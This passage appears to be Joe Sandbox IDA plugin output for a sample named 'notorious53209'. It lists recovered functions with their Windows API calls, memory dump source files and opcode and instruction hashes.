                                                  • Opcode Fuzzy Hash: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                                                  • Instruction Fuzzy Hash: F2114AB2504209EFDB118FA4DD49FDA7BA9FF08714F044166FA04E2160C6719E60AB61
                                                  Function 008F667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                                    • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                                                  • gethostbyname.WS2_32(?), ref: 008F66AC
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F66B7
                                                  • _memmove.LIBCMT ref: 008F66E4
                                                  • inet_ntoa.WS2_32(?), ref: 008F66EF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: fd7768601fa0ea7771a01b9975db32ee1289d2181d3e4b6974e98c56dd7403cc
                                                  • Instruction ID: 20d9541b82e1112d87580fe04881e803ab76f7458821861d6c662dd95d4e9450
                                                  • Opcode Fuzzy Hash: fd7768601fa0ea7771a01b9975db32ee1289d2181d3e4b6974e98c56dd7403cc
                                                  • Instruction Fuzzy Hash: F3114936500508AFCB04FBA8DD96DEEB7B8FF14310B148165F502E72A1EB30AE14DB62
                                                  Function 008D9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 008D9043
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D9055
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D906B
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D9086
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                                                  • Instruction ID: eba7ee8db19391cf4284538f46b8bbbc3c41f8d7b3e27ec5ec85c3b99ef84c98
                                                  • Opcode Fuzzy Hash: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                                                  • Instruction Fuzzy Hash: C4115E79900218FFDB10DFA5CC84E9DBBB4FB48310F204196E904B7250D6726E11DB90
                                                  Function 008E1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E166F
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E1694
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E169E
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,008E01FD,?,008E1250,?,00008000), ref: 008E16D1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 0756b77c258f17384095d7237fe7e0fbb766df9dae70cdb4793734a8b2f89d65
                                                  • Instruction ID: fc9f193974571f9d959fdfce59cd39a4ea5a7385b3486c454717b959a0e8c529
                                                  • Opcode Fuzzy Hash: 0756b77c258f17384095d7237fe7e0fbb766df9dae70cdb4793734a8b2f89d65
                                                  • Instruction Fuzzy Hash: C7118E31C1851DDBCF00AFA6D848AEEBB78FF1A701F044059E941F6250CB3056A0DBD6
                                                  Function 008B7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: 53767d400d4cd41554618c79c3a0b261653988b8827fd90d27f61716387f557b
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: 8D01403604428EBBCF125E88CC018EE3F62FF99355F598515FA19A8231D237D9B1AB81
                                                  Function 0090B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 0090B59E
                                                  • ScreenToClient.USER32(?,?), ref: 0090B5B6
                                                  • ScreenToClient.USER32(?,?), ref: 0090B5DA
                                                  • InvalidateRect.USER32(?,?,?), ref: 0090B5F5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                                                  • Instruction ID: f05e74b1d687279704ef3c71c22d22ef04735e2ee8c22e50959381d1344e4f07
                                                  • Opcode Fuzzy Hash: e68399fbccfdae6458dc5534cf85acf1d83348456247ad3a664c47e1ae61d109
                                                  • Instruction Fuzzy Hash: 381134B5D0420DEFDB51CF99C8449EEBBB9FB08310F104166E914E3620D735AA559F50
                                                  Function 0090B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 0090B8FE
                                                  • _memset.LIBCMT ref: 0090B90D
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00947F20,00947F64), ref: 0090B93C
                                                  • CloseHandle.KERNEL32 ref: 0090B94E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: e30687aadd5ad4415d315a37ee83b854c4729965549a37ec2da004a2b0eaac69
                                                  • Instruction ID: 7380a0aa45c8961f8ef8583518254b040ea5670628dcaa560f7bfd91c4be7e0d
                                                  • Opcode Fuzzy Hash: e30687aadd5ad4415d315a37ee83b854c4729965549a37ec2da004a2b0eaac69
                                                  • Instruction Fuzzy Hash: 49F089B55583087FF32027E5AC05F7BBA9CEB0A754F000460BF08D5192D7714D0497A9
                                                  Function 008E6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 008E6E88
                                                    • Part of subcall function 008E794E: _memset.LIBCMT ref: 008E7983
                                                  • _memmove.LIBCMT ref: 008E6EAB
                                                  • _memset.LIBCMT ref: 008E6EB8
                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 008E6EC8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: d03a4d6946ae4f8f2b5d2bf276619f3d3576cfe400702c93d5ac6381f82cb51e
                                                  • Instruction ID: 2ff563a280a9425f64dc05b703cd5e975ba19508b1b4c3c01211b0555b504252
                                                  • Opcode Fuzzy Hash: d03a4d6946ae4f8f2b5d2bf276619f3d3576cfe400702c93d5ac6381f82cb51e
                                                  • Instruction Fuzzy Hash: 63F0543A104200ABCF116F59DC85A49BB29FF46320F048061FE089E217C731E911DBB5
                                                  Function 0090C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0088134D
                                                    • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088135C
                                                    • Part of subcall function 008812F3: BeginPath.GDI32(?), ref: 00881373
                                                    • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088139C
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0090C030
                                                  • LineTo.GDI32(00000000,?,?), ref: 0090C03D
                                                  • EndPath.GDI32(00000000), ref: 0090C04D
                                                  • StrokePath.GDI32(00000000), ref: 0090C05B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: c3d69b134f6bf8e75a6385e90c25df539864f2c5917e96e0ec04e26e3ee1a297
                                                  • Instruction ID: 671a20c3f10354cf89c168491093917311302aa815b035f4d8a4f7fba35a30fd
                                                  • Opcode Fuzzy Hash: c3d69b134f6bf8e75a6385e90c25df539864f2c5917e96e0ec04e26e3ee1a297
                                                  • Instruction Fuzzy Hash: 64F0B832018219BFDB226F54AC0AFCE3FA8AF0A310F048100FA11614E287B51661EBE6
                                                  Function 008DA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008DA399
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA3AC
                                                  • GetCurrentThreadId.KERNEL32(00000000), ref: 008DA3B3
                                                  • AttachThreadInput.USER32(00000000), ref: 008DA3BA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: 8bd6403736d547c95e05bc4bd7b5be903607dc2d767f22ede7fcd3b786fd0f54
                                                  • Instruction ID: 00cf035f16c98847c94630c4ea7668f2187005d3baabfbc3e1209d2ed75938ba
                                                  • Opcode Fuzzy Hash: 8bd6403736d547c95e05bc4bd7b5be903607dc2d767f22ede7fcd3b786fd0f54
                                                  • Instruction Fuzzy Hash: EAE0393114932CBADB245BA2DC0CED73F1CFF167A1F008125F508C4560CA72C640EBA0
                                                  Function 00882218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00882231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 0088223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00882250
                                                  • GetStockObject.GDI32(00000005), ref: 00882258
                                                  • GetWindowDC.USER32(?), ref: 008BC0D3
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 008BC0E0
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 008BC0F9
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 008BC112
                                                  • GetPixel.GDI32(00000000,?,?), ref: 008BC132
                                                  • ReleaseDC.USER32(?,00000000), ref: 008BC13D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: 15df1d7a2d2dd0e8c4e45ff5dded537f8f9c0e7b9a839cb33ae367b6a0159b7d
                                                  • Instruction ID: f92745601baef6bc5590dad35efcb25da48abddcf3b69455c00245afa14cb4e6
                                                  • Opcode Fuzzy Hash: 15df1d7a2d2dd0e8c4e45ff5dded537f8f9c0e7b9a839cb33ae367b6a0159b7d
                                                  • Instruction Fuzzy Hash: A1E06D32118244EEDFB15F68FC0D7E87B14FB05336F008366FA69980E187714A90EB11
                                                  Function 008D8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,008D86DD,?,?,?,008D882E), ref: 008D8C63
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,008D882E), ref: 008D8C6A
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008D882E), ref: 008D8C77
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,008D882E), ref: 008D8C7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                                                  • Instruction ID: 00a91701c4ac58f54e635b0223bcb8564acb5719eb4e6d72e87f57029692daca
                                                  • Opcode Fuzzy Hash: 4d6e4ffa7b728429bccbf41f20e703944abc514dc821944f85da3daf0eda38b0
                                                  • Instruction Fuzzy Hash: 59E08636666211DFD7705FB06D0CB563BBCFF50BA2F044828B245D9040DA348545EB71
                                                  Function 008C2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 008C2187
                                                  • GetDC.USER32(00000000), ref: 008C2191
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008C21B1
                                                  • ReleaseDC.USER32(?), ref: 008C21D2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: 201b76a954a9f340f8002164829366363f909c75e30f7b12b952621642c211f1
                                                  • Instruction ID: 4bb31af462a836cf4dc669b3aad38e97f7a77ba69e106c0a94633c358a1887db
                                                  • Opcode Fuzzy Hash: 201b76a954a9f340f8002164829366363f909c75e30f7b12b952621642c211f1
                                                  • Instruction Fuzzy Hash: FFE0E575814618EFDF51AFA4C818AAD7BB1FB4C350F108429F95AD7660CB399241AF40
                                                  Function 008C219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 008C219B
                                                  • GetDC.USER32(00000000), ref: 008C21A5
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008C21B1
                                                  • ReleaseDC.USER32(?), ref: 008C21D2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: fc02075a160a274533bc807fbfab0d59bae82ffad2f3a84f69e0164cba4a7fb7
                                                  • Instruction ID: 24862c23ef5b2a967b2dcd3cf80ed20b4155ddce2eff410a486da36ba510c2a8
                                                  • Opcode Fuzzy Hash: fc02075a160a274533bc807fbfab0d59bae82ffad2f3a84f69e0164cba4a7fb7
                                                  • Instruction Fuzzy Hash: F3E012B5814608AFCF61AFB4C818AAD7BF1FF4C310F108029F95AE7620CB399241AF40
                                                  Function 008DB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 008DB981
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
